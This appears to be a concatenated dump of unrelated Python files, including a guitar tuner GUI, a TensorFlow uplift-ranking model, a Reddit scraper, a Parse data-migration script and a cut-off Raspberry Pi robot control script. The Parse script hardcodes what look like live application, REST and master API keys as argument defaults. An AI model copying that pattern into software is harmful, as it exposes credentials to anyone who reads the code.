correct_entry = True
if correct_entry:
sample_freq=guitar_tuning()
if (not correct_entry):
output = 'Invalid Entry, Please enter again.'
elif abs(sample_freq-freq)<4 or abs(sample_freq-2*freq)<8:
output="Just Right!"
elif (sample_freq-freq)>4:
output="Loosen!"
elif (sample_freq-freq)<-4:
output="Tighten!"
listbox.insert(Tk.END,output)
def guitar_tuning_gui():
import tkinter as Tk
global E1,listbox,Tk
root = Tk.Tk()
#button,label,entry
listbox=Tk.Listbox(root)
# Define widgets
L1 = Tk.Label(root, text = 'Enter Target Key (E_low,E_high,A,D,G,B)')
E1 = Tk.Entry(root)
B1 = Tk.Button(root, text = 'Result', command = get_result)
L1.pack()
E1.pack()
B1.pack()
listbox.pack()
root.mainloop()
|
983,721 | 42cbd466c652e67ab0e5a1919257b04b8143b695 | # -*- coding: utf-8 -*-
# Copyright (c) 20014 Patricio Moracho <pmoracho@gmail.com>
#
# Combinacion.py
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of version 3 of the GNU General Public License
# as published by the Free Software Foundation. A copy of this license should
# be included in the file GPL-3.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
__author__ = "Patricio Moracho (pmoracho@gmail.com)"
__version__ = "Revision: 1.1"
__date__ = "2014/06/24 13:42:03"
import datetime
from Object import Object
from Hitos import Hitos
#################################################################################################################################################
## Combinacion
#################################################################################################################################################
class Combinacion(Object):
"""
Clase para el manejo de una combinacion de Hitos / Proyecciones
"""
numero = 1
def __init__(self, distancias, horadesde="", horahasta=""):
Object.__init__(self)
self.hitos = Hitos(distancias, horadesde, horahasta)
self.horadesde = horadesde
self.horahasta = horahasta
self.descripcion = ""
self.distancias = distancias
self.numero = Combinacion.numero
Combinacion.numero = Combinacion.numero + 1
def __repr__(self):
"""Class representation"""
return self.__str__()
def __str__(self):
"""String representation"""
return '[%s: (%d), %d, %s, %s, %s, %s]' % (self.__class__.__name__, self.id, self.numero, self.horadesde, self.horahasta, self.descripcion, Combinacion.__get_nice_string(self.hitos))
def __get_nice_string(list):
return "[" + ", ".join(str(item) for item in list) + "]"
def __len__(self):
"""Len of the list container"""
return len(self.hitos)
def __iter__(self):
return iter(self.hitos)
def reset_numero(self):
Combinacion.numero = 0
def addhito(self, hito):
self.hitos.add(hito)
self.hitos.sort()
def validhito(self, hito):
"""
Valida un hito con relación al resto del histos en la combinación
"""
if not self.hitos: # No hay ningún hito en la lista
if not self.validtimefilter(hito):
return False
elif hito in self.hitos: # El hito ya se enuentra en la lista
return False
elif self.existtema(hito): # El tema del hito ya se existe en la lista
return False
elif not self.validtimefilter(hito): # El hito está dentro de las horas en que se quiere participar del evento
return False
elif not self.validtimecombination(hito): # El hito es posible de cumplir en función de los horarios y trayectos del resto de los hitos
return False
elif not self.validcambiosbarrio(hito): # TODO: Cuantos cambios de barrio queremos hacer?
return False
elif not self.validcantidadhitosmax(hito): # TODO: Cuantas películas por día
return False
return True
def hitosdiferentes(self, combinacion):
return list(set(self.hitos) - set(combinacion.hitos))
def existtema(self, hito):
"""
Existe el tema en la lista de hitos?
"""
for h in self.hitos:
if hito.tema == h.tema:
return True
return False
def validcambiosbarrio(self, hito):
"""
Retorna verdader/falso si el hito no supera la cantidad de cambios de barrio/sedes solicitado
"""
return True
def validcantidadhitosmax(self, hito):
"""
Retorna verdader/falso si el hito supera la cantidad de peliculas máxima por día solicitada
"""
return True
def validtimefilter(self, hito):
"""
Retorna verdader/falso si el hito entra dentro del desde/hasta hora deseado
"""
if self.horadesde == "" and self.horahasta == "":
return True
else:
hora = hito.fechahora[hito.fechahora.index(" / ")+3:]
hora_hito = datetime.datetime.strptime(hora, "%H:%M")
if self.horadesde != "":
if self.isPrimerHitoDelDia(hito):
hora_desde = datetime.datetime.strptime(self.horadesde, "%H:%M")
if hora_desde > hora_hito:
return False
if self.horahasta != "":
if self.isUltimoHitoDelDia(hito):
hora_hasta = datetime.datetime.strptime(self.horahasta, "%H:%M")
#print("%s --- %s = %s --- %s" % (self.horahasta,str(hora_hasta),hora_hito, str(hora_hito)))
if hora_hasta < hora_hito:
return False
return True
def validtimecombination(self, hito):
"""
Valida si se puede insertar el hito en la combinación
"""
for i in range(-1, len(self.hitos)):
if i == -1:
inicial = None
final = self.hitos[i+1]
elif i == len(self.hitos)-1:
inicial = self.hitos[i]
final = None
else:
inicial = self.hitos[i]
final = self.hitos[i+1]
if self.validbetween(hito, inicial, final):
return True
return False
def getDate(self, fechahora):
#print("*%s*" % fechahora[0:fechahora.index(" / ")])
return fechahora[0:fechahora.index(" / ")]
def getTime(self, fechahora):
#print("*%s*" % fechahora[fechahora.index(" / ")+3:])
return fechahora[fechahora.index(" / ")+3:]
def isPrimerHitoDelDia(self, h):
for hito in self.hitos:
day_hito = self.getDate(hito.fechahora)
day_h = self.getDate(h.fechahora)
if day_hito == day_h:
if h.inicio < hito.inicio:
return True
else:
return False
return True
def isUltimoHitoDelDia(self, h):
for hito in self.hitos:
day_hito = self.getDate(hito.fechahora)
day_h = self.getDate(h.fechahora)
if day_hito == day_h:
if h.inicio > hito.inicio:
return True
else:
return False
return True
def validbetween(self, hito, inicial, final):
if inicial is None:
if ((hito.inicio + hito.tema.duracion + self.distanciabetween(hito, final)) < final.inicio):
return True
elif final is None:
if (hito.inicio > (inicial.inicio + inicial.tema.duracion+self.distanciabetween(hito, inicial))):
return True
else:
if ((hito.inicio + hito.tema.duracion + self.distanciabetween(hito, final)) < final.inicio) and \
(hito.inicio > (inicial.inicio + inicial.tema.duracion + self.distanciabetween(inicial, hito))):
return True
return False
def distanciabetween(self, origen, destino):
return self.distancias.between(origen.ubicacion, destino.ubicacion)
def report(self):
print("")
print("Combinación (%d) %d" % (self.id, self.numero))
print("")
self.hitos.report()
print()
def get_html(self, max=None):
return self.hitos.get_htmltable()
|
983,722 | 1986aa4e9d518fa7c6bcfa905e9ad2cda6e140e8 | from django.apps import AppConfig
class SdcConfig(AppConfig):
name = 'sdc'
|
983,723 | 6006dce2ba692532f614d2cffe014919017e75ff | grade = 95
if grade > 90 :
print("You got A")
elif grade > 80 :
print("you got B")
elif grade > 70 :
print("C")
else :
print("You are a total failure")
if grade > 90 :
print("Your grade is A")
if not(grade > 90) and (grade > 80) :
print("Your grade is B")
|
983,724 | f4ae8eca8e09acd7fbc8c2137db1ae51479141a3 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 2 15:42:08 2020
@author: ehsan.mousavi
"""
import pandas as pd
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
#ModelType.DRM_MODEL = "DRM"
from datetime import datetime
get_dt_str = lambda :datetime.now().strftime(format = "%b %d %Y %H:%M:%S")
class BaseModel():
def __init__(self):
pass
class MULTI_DRM_Gradient(BaseModel):
"""Direct Ranking Model using Gradient Descent."""
#model_type = ModelType.DRM_MODEL
def __init__(self,
number_structures,
keep_prob = .5,
dim_inputs=None,
dim_hidden_lst=[],
obj_rule='cpiv',
shadow=None,
est_individual=False,
learning_rate=1e-1,
reg_scale=1e-1, reg_type='L2', epochs=100, target_loss=None, print_every=10,
verbose=True, plot_losses=False, random_seed=None,
standardization_input=True,**kwargs):
"""
Set hyper-parameters and construct computation graph.
:param number_structures: number of different structures (including the control)
:param keep_prob: keep probboblity in drop-out regularization
:param dim_inputs: input feature dimensions, if None, then this value will be inferred during fit
:param dim_hidden_lst: number of neurons for hidden layers ([] means linear model)
:param obj_rule: objective to optimize during training, could be cpiv (inc cost per inc value),
lagrangian (lambda expression), value, cost (maximize delta values) or ivc (inc value per inc cost)
:param est_individual: if True, then estimate the individual incremental value or cost, which depends on
parameter obj_rule (only for value or cost)
:param shadow: shadow price (lambda) for Lagrange objective, if None, use CPIT
:param learning_rate: learning rate for gradient descent
:param reg_scale: regularization factor
:param reg_type: type of regularization, 'L1' or 'L2'
:param epochs: number of epochs for training
:param target_loss: target loss for training
:param print_every: print every n training epochs
:param verbose: if verbose during training
:param plot_losses: if plot losses during training
:param random_seed: random seed used to control the graph, if None then not control for random seed
:param standardization_input: transfer the input to mean zero variance 1
"""
# super(MULTI_DRM_Gradient, self).__init__()
plot_losses = True
self.number_structures = number_structures
self.keep_prob = keep_prob
self.dim_inputs = dim_inputs
self.dim_hidden_lst = dim_hidden_lst
self.obj_rule = obj_rule
self.est_individual = est_individual
self.shadow = shadow
self.learning_rate = learning_rate
self.reg_scale = reg_scale
self.reg_type = reg_type
self.epochs = epochs
self.target_loss = target_loss
self.print_every = print_every
self.verbose = verbose
self.plot_losses = plot_losses
self.random_seed = random_seed
self.standardization_input = standardization_input
# non-initialized session
self.sess = None
self.scaler = None
# build graph here if dim_inputs is passed
if self.dim_inputs is not None:
self._build_graph()
# dictionary hold training statistics
self.train_stats = {}
def get_params(self):
"""
:return: dictionary of hyper-parameters of the model.
"""
return {
'dim_inputs': self.dim_inputs,
'dim_hidden_lst': self.dim_hidden_lst,
'obj_rule': self.obj_rule,
'shadow': self.shadow,
'est_individual': self.est_individual,
'learning_rate': self.learning_rate,
'reg_scale': self.reg_scale,
'reg_type': self.reg_type,
'epochs': self.epochs,
'target_loss': self.target_loss,
'print_every': self.print_every,
'verbose': self.verbose,
'plot_losses': self.plot_losses,
'random_seed': self.random_seed,
}
def _create_placeholders(self):
"""Create placeholders for input data."""
with tf.name_scope("data"):
self.X = tf.placeholder(tf.float32, shape=[None, self.dim_inputs], name='X')
self.value = tf.placeholder(tf.float32, shape=[None], name='value')
self.cost = tf.placeholder(tf.float32, shape=[None], name='cost')
# self.sample_weight = tf.placeholder(tf.float32, shape=[None, 1], name='sample_weight')
self.cohort_weight = tf.placeholder(tf.float32, shape=[None, self.number_structures], name='cohort_weight')
self.control_value = tf.placeholder(tf.float32, shape=[1], name='control_value')
self.control_cost = tf.placeholder(tf.float32, shape=[1], name='control_cost')
def _create_variables(self):
"""Create variables for the model."""
with tf.name_scope("variable"):
if self.reg_type == 'L2':
regularizer = tf.contrib.layers.l2_regularizer(scale=self.reg_scale)
else:
regularizer = tf.contrib.layers.l1_regularizer(scale=self.reg_scale)
self.dim_lst = [self.dim_inputs] + self.dim_hidden_lst + [self.number_structures]
print(self.dim_lst)
self.W_lst = []
self.b_lst = []
for i in range(len(self.dim_lst)-1):
self.W_lst.append(tf.get_variable(
"W{}".format(i+1),
shape=[self.dim_lst[i], self.dim_lst[i+1]],
initializer=tf.contrib.layers.xavier_initializer(),
regularizer=regularizer)
)
# not output layer, has bias term
if i < len(self.dim_lst) - 2:
self.b_lst.append(tf.get_variable("b{}".format(i+1), shape=[self.dim_lst[i+1]]))
def _create_prediction(self):
"""Create model predictions."""
epsilon = 1e-3
with tf.name_scope("prediction"):
h = self.X
for i in range(len(self.dim_lst) - 1):
# not output layer, has bias term
if i < len(self.dim_lst) - 2:
h = tf.matmul(h, self.W_lst[i]) + self.b_lst[i]
h = tf.nn.relu(h)
h = tf.nn.dropout(h, keep_prob=self.keep_prob)
# output layer
else:
h = tf.matmul(h, self.W_lst[i])
# batch_mean, batch_var = tf.nn.moments(h,[0])
# scale = tf.Variable(tf.ones([self.dim_lst[-1]]))
# beta = tf.Variable(tf.zeros([self.dim_lst[-1]]]))
# BN = tf.nn.batch_normalization(h,
# batch_mean,
# batch_var,
# beta,
# scale,
# epsilon)
# h = tf.nn.softmax(BN)
# h = tf.nn.softmax(20*tf.nn.tanh(h))
h = tf.nn.softmax(20*h)
self.score = h
def _create_loss(self):
"""Create loss based on true label and predictions."""
with tf.name_scope("loss"):
# gini=(tf.nn.l2_loss( self.score))/100000
gini = tf.losses.softmax_cross_entropy(self.score, 0*self.score)
promo_prob=tf.reduce_sum(tf.multiply(self.score, self.cohort_weight),
axis=1)
inc_value = tf.reduce_mean(tf.multiply(promo_prob, self.value))- self.control_value
inc_cost = tf.reduce_mean( tf.multiply(promo_prob, self.cost)) - self.control_cost
# determine loss function based on self.obj_rule
if self.obj_rule == 'cpiv':
self.objective = inc_cost / inc_value
elif self.obj_rule == 'ivc':
# maximize ivc
self.objective = - inc_value / inc_cost
elif self.obj_rule == 'lagrangian':
assert self.shadow is not None, 'Need to pass in shadow value if use lagrangian as obj_rule.'
self.objective = inc_cost - self.shadow * inc_value
elif self.obj_rule == 'value':
# maximize delta values
self.objective = - inc_value
# use only cost as objective
elif self.obj_rule == 'cost':
# maximize delta cost
self.objective = - inc_cost
else:
raise Exception('Invalid obj_rule!')
# regularization
reg_loss = tf.reduce_sum(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES))
# weights = tf.trainable_variables() # all vars of your graph
# reg_loss = tf.norm( weights,ord=1)
# final loss
self.loss = self.objective +reg_loss+.1*gini
def _create_optimizer(self):
"""Create optimizer to optimize loss."""
with tf.name_scope("optimizer"):
self.train_step = tf.train.AdamOptimizer(self.learning_rate).minimize(self.loss)
def _build_graph(self):
"""Build the computation graph."""
self.graph = tf.Graph()
# set self.graph as default graph
with self.graph.as_default():
# # clear old variables
# tf.reset_default_graph()
# set random seed
if self.random_seed is not None:
tf.set_random_seed(self.random_seed)
self._create_placeholders()
self._create_variables()
self._create_prediction()
self._create_loss()
self._create_optimizer()
self._init = tf.global_variables_initializer()
self.saver = tf.train.Saver()
# create session
self.sess = tf.Session(graph=self.graph)
@staticmethod
def _calculate_avg_inc_value_cost(y):
"""
Calculate average incremental values and cost
:param y: numpy array, [value, cost, is_treatment]
:return: numpy array with 2 number, [avg inc value, avg inc cost]
"""
is_treatment = y[:, -1].astype(bool)
y_t = y[is_treatment, :2]
y_c = y[~is_treatment, :2]
return np.mean(y_t, axis=0) - np.mean(y_c, axis=0)
def save(self, path=None, spark=None):
"""
Derived from BaseModel class.
Save the model: model.save_model(path='model_ckpts/model.ckpt')
Saved files: checkpoint, model.ckpt.meta, model.ckpt.index, model.ckpt.data-00000-of-00001
"""
print({
'msg': 'DRM_Gradient.save start',
'path': path,
})
create_dir_if_not_exist(path)
self.saver.save(self.sess, path)
model_info = {
'model_type': self.model_type,
'path': path,
'params': self.get_params(),
}
print({
'msg': 'DRM_Gradient.save finish',
'model_info': model_info,
})
return model_info
@classmethod
def load(cls, model_info=None, abs_dir=None, spark=None):
"""
Derived from BaseModel class.
Load the model.
"""
print({
'msg': 'DRM_Gradient.load start',
'model_info': model_info,
'abs_dir': abs_dir,
})
model = DRM_Gradient(**model_info['params'])
abs_path = get_abs_path(model_info['path'], abs_dir=abs_dir)
model.saver.restore(model.sess, abs_path)
print({
'msg': 'DRM_Gradient.load finish',
})
return model
def calculte_control_cost_value(self,y,control_weight):
N = y.shape[0]
vc = np.dot(y[:,0],control_weight)/N
cc = np.dot(y[:,1],control_weight)/N
return vc,cc
def fit(self, X=None,
y=None,
cohort_weight = None,
control_column=-1 ,
sample_weight=None, **kwargs):
"""
Train the model
:param X: input features
:param y: label value, cost
:param cohort_weight
:param control_column: the column at which we have control
:param sample_weight: array of weights assigned to individual samples. If not provided, then unit weight
:return: None
"""
assert self.target_loss is not None, "Must pass in target_loss!"
assert y.shape[1] == 2, 'y should have 2 columns!'
# sample_weight = check_sample_weight(sample_weight, [y.shape[0], 1])
# infer dim_inputs from X
self.dim_inputs = X.shape[1]
if self.standardization_input:
self.scaler = StandardScaler().fit(X)
X = self.scaler.transform(X)
# TensorFlow initialization
self._build_graph()
# setting up variables we want to compute (and optimizing)
variables = [self.loss, self.objective, self.train_step, self.W_lst]
#calculate the control cost and value
value_c,cost_c = self.calculte_control_cost_value(y,cohort_weight[:,control_column])
# initialize variables
self.sess.run(self._init)
# record losses history
objective_lst = []
loss_lst = []
for e in range(self.epochs):
# gradient descent using all data
# create a feed dictionary for this batch
feed_dict = {
self.X: X,
self.value: y[:,0],
self.cost: y[:,1],
self.cohort_weight: cohort_weight,
self.control_value: [value_c],
self.control_cost: [cost_c],
# self.sample_weight: sample_weight,
}
loss, objective, train_step, W_lst = self.sess.run(variables, feed_dict=feed_dict)
# aggregate performance stats
# convert to float so it can be serialized to JSON
loss_lst.append(float(loss))
objective_lst.append(float(objective))
# print every now and then
if ((e + 1) % self.print_every == 0 or e == 0) and self.verbose:
print("Epoch {0}: with training loss = {1}".format(e + 1, loss[0]))
final_loss = loss_lst[-1]
if self.verbose:
print({
# 'ts': get_dt_str(),
'msg': 'DRM_gradient.fit',
'final_loss': final_loss,
'target_loss': self.target_loss,
})
assert final_loss < self.target_loss, \
'Final loss: {}, target loss {} not reached, terminated'.format(final_loss, self.target_loss)
# calculate average incremental value and cost in training set
self.avg_inc_value_cost = self._calculate_avg_inc_value_cost(y)
if self.plot_losses:
plt.plot(loss_lst)
plt.plot(objective_lst)
plt.grid(True)
plt.title('Historical Loss')
plt.xlabel('Epoch Number')
plt.ylabel('Epoch Loss')
plt.show()
# ToDo modularize logging the training statistics
self.train_stats['objective_lst'] = objective_lst
self.train_stats['loss_lst'] = loss_lst
if self.verbose:
print({
'ts': get_dt_str(),
'msg': 'DRM_gradient.fit finish',
'final_loss': final_loss,
'target_loss': self.target_loss,
# 'W_lst': W_lst,
'W_lst[0].shape': W_lst[0].shape,
'W_lst[0].type': type(W_lst[0]),
})
def predict(self, X, **kwargs):
"""
Predict
:param X: features in numpy array
:return:
"""
if self.standardization_input:
assert self.scaler is not None, "Training is not standardized"
X = self.scaler.transform(X)
assert self.sess is not None, "Model has not been fitted yet!"
score = self.sess.run(self.score, feed_dict={self.X: X})
return score
@property
def weights_lst(self):
"""
Return the list of weights (length of this list is the number of layers).
:return: a list with weights in each layer
"""
assert self.sess is not None, "Model has not been fitted yet!"
return self.sess.run(self.W_lst)
@property
def coef_(self):
"""
Estimated coefficients for the linear DRM
:return: array, shape (n_features, )
"""
assert self.sess is not None, "Model has not been fitted yet!"
return self.sess.run(self.W_lst)[0]
def get_metrics(self):
"""
Get metrics of the model.
:return: a list of json representing metrics.
"""
f = Figure(title='DRM_Gradient Train Loss', x_axis_label='Epoch', y_axis_label='Value')
f.line(color='blue',
x=range(len(self.train_stats['loss_lst'])),
y=self.train_stats['loss_lst'],
legend='Loss')
f.line(color='green',
x=range(len(self.train_stats['objective_lst'])),
y=self.train_stats['objective_lst'],
legend='CPIT')
return [f.draw()]
if __name__ == "__main__":
print("main DRM function")
|
983,725 | 7ca7284c5aa33f0907436c70da8800ac77a7a6f4 | #!/usr/bin/python
import argparse
import time
from parse_rest.connection import register
from parse_rest.datatypes import Object
from parse_rest.connection import ParseBatcher
from parse_rest.user import User
from batchers import BatchSaver
# Parse Classes
class POFriendRelation(Object):
pass
class POFriendRequest(Object):
pass
class POPublicUser(Object):
pass
parser = argparse.ArgumentParser(description='Creates updated columns on Parse for OneTap. Defaults to dev, pass the correct keys to use another app.')
parser.add_argument('application_key', nargs='?', default='nORiB9P52mCaD1Sm72mKQlhLcjgHGjGkpvW7tZO5')
parser.add_argument('rest_api_key', nargs='?', default='0oQwqO36Txv9GeDxkqbi9Fdp3go82BHtNpew18We')
parser.add_argument('master_key', nargs='?', default='R5YWuexk6BUdrCGrkz5HqLDvozv5iAzjw4lUC1AX')
parser.add_argument('-d', '--delay', type=float, help='The delay between each batch save', default=2.0)
args = parser.parse_args()
register(args.application_key,
args.rest_api_key,
master_key=args.master_key)
batch_saver = BatchSaver(args.delay)
# POFriendRelation
# userId and friendUserId
# Makes you think it contains a id string when its actually a user object.
# Possible Solution
# Create new columns called user and friendUser. Add a before save that assign the value in the old column to the new column or vice versa. Then when enough people have the new version of the app, we can delete the old columns.
print 'POFriendRelation'
page_number = 0
friend_relations = POFriendRelation.Query.all().order_by("createdAt").limit(1000)
while len(friend_relations) > 0:
friend_relations_to_save = []
for friend_relation in friend_relations:
batch_saver.add_object_to_save(friend_relation)
page_number += 1
friend_relations = POFriendRelation.Query.all().order_by("createdAt").limit(1000).skip(page_number * 1000)
# POFriendRequest
# requested_user and requesting_user
# It isn't following the camelCase naming convention.
# Makes more work for the iOS app to do name conversions.
# Possible Solution
# Create new columns called requestedUser and requestingUser. Add a before save that assign the value in the old column to the new column or vice versa. Then when enough people have the new version of the app, we can delete the old columns.
print 'POFriendRequest'
page_number = 0
friend_requests = POFriendRequest.Query.all().order_by("createdAt").limit(1000)
while len(friend_requests) > 0:
friend_requests_to_save = []
for friend_request in friend_requests:
batch_saver.add_object_to_save(friend_request)
page_number += 1
friend_requests = POFriendRequest.Query.all().order_by("createdAt").limit(1000).skip(page_number * 1000)
# POPublicUser
# userId
# Should be the user object, not just the string id. Since users have an ACL, anyone that doesn't have permission will only get a user object back with a objectId.
# Possible Solution
# Create a new column called user. Add a before save that assign the value in the old column to the new column or vice versa. Then when enough people have the new version of the app, we can delete the old columns and the beforeSave.
print 'POPublicUser'
page_number = 0
public_users = POPublicUser.Query.all().order_by("createdAt").limit(1000)
while len(public_users) > 0:
public_users_to_save = []
for public_user in public_users:
batch_saver.add_object_to_save(public_user)
page_number += 1
public_users = POPublicUser.Query.all().order_by("createdAt").limit(1000).skip(page_number * 1000)
# POTrip
# userId
# Should be the user object, not just the string id.
# Possible Solution
# Create a new column called user. Add a before save that assign the value in the old column to the new column or vice versa. Then when enough people have the new version of the app, we can delete the old columns and the beforeSave.
batch_saver.save()
|
983,726 | 83fec8d684458baec35eff75c96231e9093559c9 | from collections import defaultdict
def solution(gems):
answer = []
gemnum=len(set(gems))
start,end=0,0
dic=defaultdict(int)
dic[gems[0]]=1
temp=[0,len(gems)-1]
while start<len(gems) and end<len(gems):
if len(dic)==gemnum:
if end-start<temp[1]-temp[0]:
temp=[start,end]
if dic[gems[start]]==1:
del dic[gems[start]]
else:
dic[gems[start]]-=1
start+=1
else:
end+=1
if end==len(gems):
break
if gems[end] in dic.keys():
dic[gems[end]]+=1
else:
dic[gems[end]]=1
return [temp[0]+1,temp[1]+1] |
983,727 | dd65a8c75c6a74faf32cbb091aa6a95eb2a001ef | import sys
import count_digits
import multiprocessing as mp
def main():
if len(sys.argv) < 3:
exit(f"Usage: {sys.argv[0]} POOL FILENAMEs")
size = int(sys.argv[1])
files = sys.argv[2:]
with mp.Pool(size) as pool:
results = pool.map(count_digits.count_digits, files)
count_digits.print_table(list(results))
if __name__ == "__main__":
main()
|
983,728 | 286eb395e62eaf75d3e970a830861e374d6e7852 | import json
import requests
import time
import re
import os
import io
def makeRequest(uri, payload, max_retries = 5):
def fire_away(uri):
response = requests.get(uri, payload)
assert response.status_code == 200
return json.loads(response.content)
current_tries = 1
while (current_tries < max_retries):
try:
time.sleep(1)
return fire_away(uri)
except:
time.sleep(1)
current_tries+=1
return fire_away(uri)
#get list of subreddit posts
#for each subreddit post, get the comments
#write the comments into a textfile with the submission, excluding comments from moderators/bots
#clean the resulting textfiles
def makeTextFiles(submissionlist, dir_path, after):
def deleteIrrelevantComments(commentlist):
pattern_mod = 'moderator(s?)'
j = 0
while j < len(commentlist['data']):
if (re.search(pattern_mod,commentlist['data'][j]['body']) != None or len(commentlist['data'][j]['body'])==0):
del commentlist['data'][j]
j+=1
#assumes f is open
def makeTextFile(submission,f):
payload = {'fields': 'body', 'size': submission['num_comments'],'link_id': submission['id'],'author':'!LocationBot','mod_removed':'false'}
commentlist = makeRequest('https://api.pushshift.io/reddit/search/comment/', payload)
deleteIrrelevantComments(commentlist)
f.write(submission['selftext'])
for i in range(len(commentlist['data'])):
#write to textfile
f.write(' ' + commentlist['data'][i]['body'])
for j in range(len(submissionlist['data'])):
if ('id' not in submissionlist['data'][j])|('num_comments' not in submissionlist['data'][j])|('selftext' not in submissionlist['data'][j]):
print('Avoided Key Error')
continue
f = open(os.path.join(dir_path, 'doc{}-{}.txt'.format(after,j)), 'w')
makeTextFile(submissionlist['data'][j], f)
f.close()
def cleanFiles(dir_path, dir_name, parent_dir, after):
cleaned_dir_path = os.path.join(parent_dir, dir_name + '_cleaned')
if not os.path.isdir(cleaned_dir_path):
os.mkdir(cleaned_dir_path)
dirlist = ['doc{}-{}.txt'.format(after,i) for i in range(100)]
for filename in dirlist:
if not os.path.exists(os.path.join(dir_path,filename)):
continue
file = open(os.path.join(dir_path,filename), 'r')
content = file.read()
content = content.lower()
#delete quotes
#pattern_quoted = r'>([\w\s’\'.?/,()]*\n\n|[\w\s’\'/,()]*)'
#pattern_quoted = r'>([\w\s’\'.?/,()]*\n)'
#content = re.sub(pattern_quoted,' ', content)
#delete urls
pattern_url = r'http(s?)://[\w/#\\:?._~-]*'
content = re.sub(pattern_url,' ', content)
#delete [removed], [deleted]
pattern_removed = r'\[removed\]|\[deleted\]'
content = re.sub(pattern_removed, ' ', content)
#delete subreddit titles
pattern_subreddit = r'r/\w*'
content = re.sub(pattern_subreddit,' ', content)
pattern_html = r'>|<|≥|≤|(&(#x200B;)?)'
content = re.sub(pattern_html,' ', content)
#strip 's and (s)
pattern_s = r'(\'|’)s|\(s\)'
content = re.sub(pattern_s,' ', content)
#delete punctuation
pattern_symbols = r'(\*|\[|\]|\(|\)|-|/|\.(\.)+|,|\?)+'
content = re.sub(pattern_symbols,' ', content)
#delete words with that end with 't, 've, 're, 'll
pattern_contractions = r'\w*(\'|’)(t|ve|re|ll|d)'
content = re.sub(pattern_contractions,' ', content)
#reduce all multiple whitespaces to 1
pattern_whitespace = r'(\s)+'
content = re.sub(pattern_whitespace,' ', content)
new_file = open(os.path.join(cleaned_dir_path, filename), 'w')
new_file.seek(0)
new_file.truncate(0)
new_file.write(content)
new_file.close()
file.close()
parent_dir = '/Users/soumyadugg/legal_advice_data'
dir_name = 'legal_advice_files'
dir_path = os.path.join(parent_dir, dir_name)
if not os.path.isdir(dir_path):
os.mkdir(dir_path)
uri = 'https://api.pushshift.io/reddit/search/submission/'
subreddit = 'legaladvice'
request_size = 100
payload = {'fields': ['id','num_comments','selftext'],
'subreddit': subreddit,
'size': request_size,
'author':'!LocationBot',
'mod_removed':'false',
'user_removed':'false',
'after':'',
'selftext:not':'[removed]','selftext:not':'[deleted]'}
for i in range(1000):
after = str(600+i)
print(str(i) + ' ' + after)
payload['after'] = after+'d'
submissionlist = makeRequest(uri, payload)
makeTextFiles(submissionlist, dir_path, after)
cleanFiles(dir_path, dir_name, parent_dir, after)
|
983,729 | 7533c2bafc4a2a12e4786d8572dc52c10a5a1c54 | """
HackerRank Algorithms Implementation Beautiful Days at the Movies
author: Manny egalli64@gmail.com
info: http://thisthread.blogspot.com/
https://www.hackerrank.com/challenges/beautiful-days-at-the-movies/problem
Given three integers i, j, k
Return how many beautiful number are in [i .. j] where
beautiful means that abs(x - reverse(x)) % k == 0
"""
def solution(first, last, divisor):
result = 0
for i in range(first, last + 1):
if (i - int(str(i)[::-1])) % divisor == 0:
result += 1
return result
if __name__ == '__main__':
i, j, k = map(int, input().split())
print(solution(i, j, k)) |
983,730 | 559612e094ee76097b66c7a8c6be6b6fdb6a8858 | # import the necessary packages
from picamera.array import PiRGBArray
from picamera import PiCamera
import time
import cv2
import maestro
import numpy as np
import client
# initialize the camera and grab a reference to the raw camera capture
camera = PiCamera()
camera.resolution = (640, 480)
camera.framerate = 32
rawCapture = PiRGBArray(camera, size=(640, 480))
#Set motor enums
MOTORS = 1
TURN = 2
BODY = 0
HEADTILT = 4
HEADTURN = 3
#Set motor values
tango = maestro.Controller()
body = 6000
headTurn = 6000
headTilt = 6000
turn = 6000
maxMotor = 5675
maxLeftTurn = 7000
maxRightTurn = 5000
motors = 6000
tCounter = 0
hCounter = 0
temp = 0
i = 0
#Assign values to motors
tango.setTarget(HEADTURN, headTurn)
tango.setTarget(HEADTILT, headTilt)
#tango.setTarget(TURN, turn)
#tango.setTarget(BODY, body)
#
# allow the camera to warmup
time.sleep(1)
#Set timer variables
start_time = 0.0
bodyFlag = True
distFlag = True
time_flag = True
findHumanFlag = True
# capture frames from the camera
cv2.namedWindow("Robo", cv2.WINDOW_NORMAL)
cv2.resizeWindow("Robo", 800, 400)
cv2.moveWindow("Robo", 0, 0)
def shutdown():
#motors = 6000
turn = 6000
headTilt = 6000
#tango.setTarget(MOTORS, motors)
tango.setTarget(TURN, turn)
tango.setTarget(HEADTILT, headTilt)
tango.setTarget(BODY, 6000)
client.client.killSocket()
def nextSearchPosition():
positions = [(6000, 6000, 6000), (6000, 7000, 6500), (6800, 7000, 6500), (6000, 7000, 6500), (5200, 7000, 6500), (6000, 6000, 6000),
(5200, 5000, 5500), (6000, 5000, 5500), (6800, 5000, 5500)] #tilt, turn, bodyturn
global headTilt, headTurn, i
headTilt = positions[i][0]
headTurn = positions[i][1]
tango.setTarget(HEADTURN, headTurn)
tango.setTarget(HEADTILT, headTilt)
tango.setTarget(BODY, positions[i][2])
time.sleep(1)
i = i + 1
if(i == 9):
i = 0
def centerBody(xabs, yabs, xdist):
global body, motors, turn, bodyFlag, headTilt, headTurn
if(headTurn == 5000):
body = 5400
turn = 5000
tango.setTarget(MOTORS, motors)
tango.setTarget(TURN, turn)
time.sleep(.8)
elif(headTurn == 7000):
body = 6600
turn = 7000
tango.setTarget(MOTORS, motors)
tango.setTarget(TURN, turn)
time.sleep(.8)
elif(xabs > 75):
if(xdist > 0): #turn robot left
if(body < 6000): #if was previously turned other way
body = 6000
if(body == 6000):
body = 6600
if(body == 6600): #already turned body, so turn machine
turn = 7000
#tango.setTarget(MOTORS, motors)
tango.setTarget(TURN, turn)
time.sleep(0.5)
body = 6000
elif(xdist < 0): # turn robot right
if(body > 6000): # if was previously turned other way
body = 6000
if(body == 6000):
body = 5550
if(body == 5550):
turn = 5000
tango.setTarget(MOTORS, motors)
tango.setTarget(TURN, turn)
